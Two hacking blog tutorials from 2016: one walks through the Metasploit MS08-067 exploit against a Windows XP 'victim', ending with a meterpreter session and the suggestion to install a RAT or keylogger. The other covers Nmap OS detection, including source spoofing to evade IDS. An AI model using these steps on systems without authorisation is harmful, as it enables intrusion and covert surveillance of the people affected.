Sunday, September 4, 2016

Compromising A Windows User with Metasploit Written by dubizubi

Compromising A Windows User with Metasploit
Basic Commands in METASPLOIT
1-Search:
MetaSploit has a built in search feature which is used to search for a specific Exploit , Payload ,
Auxiliary module lets suppose we are searching for “filezilla” it’s an exploit related to ftp client name.
You will use following commands :
1-Type msfconsole on terminal in Kali Linux



2-After msf> command appear type search <exploit>


2-Use:
The “use” command would load a particular auxiliary/exploit module. Following is the snap shot which explain it all.

3-Info:
This command is basically used to to load basic information about Exploit, Payload etc.
Following is the snap shot which will revel all the information.


3-Show Option:
This command will show the attacker to set RHOST, LHOST etc.
RHOST: Remote Host , its basically Remote IP.
LHOST: Local Host , Its basically Local Ip


Compromising A Windows Based Host
Now we will use above commands and with some additional commands to compromise a windows based host. We will use Windows xp for this purpose you can Search exploit for windows 7 , 8 etc.
Latest windows 7 & 8 are vulnerable to PDF attack where attacker uses to send a specially crafted PDF file to his victim and there He is able to compromise victim PC.
So now let’s start…
1-use following command to search for particular vulnerability in Windows based operating system.
            nmap <targetiP> --script=smb-check-vulns

Following are the result of this command


The output explains it all. It basically reveled that OS is vulnerable to MS08-067 vulnerability
So you can also use other tools to find vulnerabilities but I prefer this tool because its fast and reliable.


2- Now we will use the following command to search for exploits related to this vulnerability.

Search ms08_067_netapi
It will search for the exploit, Remember that metasploit have huge database related to exploits and payload. This command will show the following results:


4- Now we will use this exploit simply typing “ use <exploit – path >” and it will be automatically  loaded , Following will be the output of this command.



Now afterward you have to follow these steps:
a)    Type  “show options” command in terminal
b)    Set RHOST <Target IP>
c)     Set LHOST <You IP>
d)    SET LPORT <Your open port>

5-Now it’s the last step, you have to just type exploit command to launch this attack, and your meterpreter session would be ON and you can run different commands on your victim Operating System and you can even install your on software on victim pc such as RAT (Remote Access tool) or Key Logger.

if you need any other help then follow me on twitter

twitter.com/octane20077
Thanks
regards Zubair shahzad Arain (dubizubi)

Happy Hacking   

Detect the Operating System of Victim machine using Nmap written By dubizubi

How    to  Detect  the  Operating  System  of  Victim machine  using Nmap.

Nmap is a one of the  powerful tool  that   can tell you  which   OS  is  using  your   victim  machine. By using  Nmap  we  can  also  find  that which  services  are running on  target  machine .  I  am   writing  this  tutorial  to  tell  you that  how can  we    find  the  OS  of  target  machine .

Requirements:
  • Nmap (graphical version is Zenmap)
In kali Linux it is pre installed .
I am using MAC OSX and I have installed Nmap on it. if you want to know more about Nmap then visit (nmap.org).


Steps to find the OS of target.
1. Open the terminal type Nmap command to view the help . Actually from this help page you can read yourself because there's so many options you can use to perform your scanning technique.

2. Simple and basic technique of scanning. Just enter command Nmap <target IP address>


3.     Now we use Nmap --script smb-os-dicovery.nse 192.168.xxx.xxx . we can also use Nmap -O <target ip>.



If you see the Nmap help, there's so many switch you can use but in this tutorial I will not describe all of that switch because you can read more on Nmap official website help page.

-v : Increase verbosity level (use -vv or more for greater effect)
-S <IP_Address> : Spoof source address -- used to trick the firewall/IDS
-e <iface> : Use specified interface
-Pn : Treat all hosts as online -- skip host discovery
-sV : Probe open ports to determine service/version info -- very useful to get detailed information about the service
-T<0-5> : Set timing template (higher is faster)--see picture below
-O : Enable OS detection





if you need any other help then follow me on twitter

twitter.com/octane20077
Thanks
regards Zubair shahzad Arain (dubizubi)
happy hacking